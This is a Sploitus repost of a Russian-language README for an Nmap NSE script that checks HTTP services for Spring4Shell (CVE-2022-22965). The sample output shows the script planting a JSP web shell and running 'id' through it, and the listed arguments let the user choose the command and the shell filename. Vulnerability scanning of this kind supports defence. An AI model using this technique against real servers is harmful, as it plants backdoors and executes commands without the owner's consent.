Sploitus

Exploit for nmap-spring4shell

kitploit · 2026-08-25

Exploit Code

MARKDOWN52 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GPIECHNIK2-NMAP-SPRING4SHELL
# Nmap-spring4shell

Log4shell-nmap — это NSE-скрипт для обнаружения уязвимостей Spring4Shell RCE (CVE-2022-22965) в HTTP-сервисах. Скрипт внедряет корректную полезную нагрузку (payload) в приложение, а затем выполняет следующую команду на указанном endpoint.

## Уязвимость

См. здесь.

## Использование

root@kitploit:~
    
    
    ┌──(kali㉿kali)-[~/nmap-spring4shell]
    └─$ nmap 127.0.0.1 --script=./spring4shell.nse
    (...)
    PORT     STATE SERVICE    REASON  VERSION
    8080/tcp open  http-proxy syn-ack
    | spring4shell: 
    |   VULNERABLE:
    |   Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2022-22965
    |     Check results:
    |       127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
    |     Extra information:
    |       TESTED URL: 127.0.0.1:8080
    |       COMMAND: id
    |       ASSERTION: uid
    |     References:
    |_      https://vulners.com/cve/CVE-2022-22965
    

## Аргументы

В скрипте можно использовать несколько переменных. Они следующие:

  * `endpoint` — относительный URL. Для `https://bugspace.pl/search/videos` это будет `/search/videos`,
  * `command` — команда, выполняемая на сервере. По умолчанию используется `id`,
  * `assertion` — проверяемая строка в ответе сервера. По умолчанию используется `uid`,
  * `filename` — имя файла на сервере. Для получения дополнительной информации см. здесь. По умолчанию используется `shell`.



## Дополнительные данные

Протестировано на приложении отсюда и отсюда

## Лицензия

Такая же, как у Nmap. См. https://nmap.org/book/man-legal.html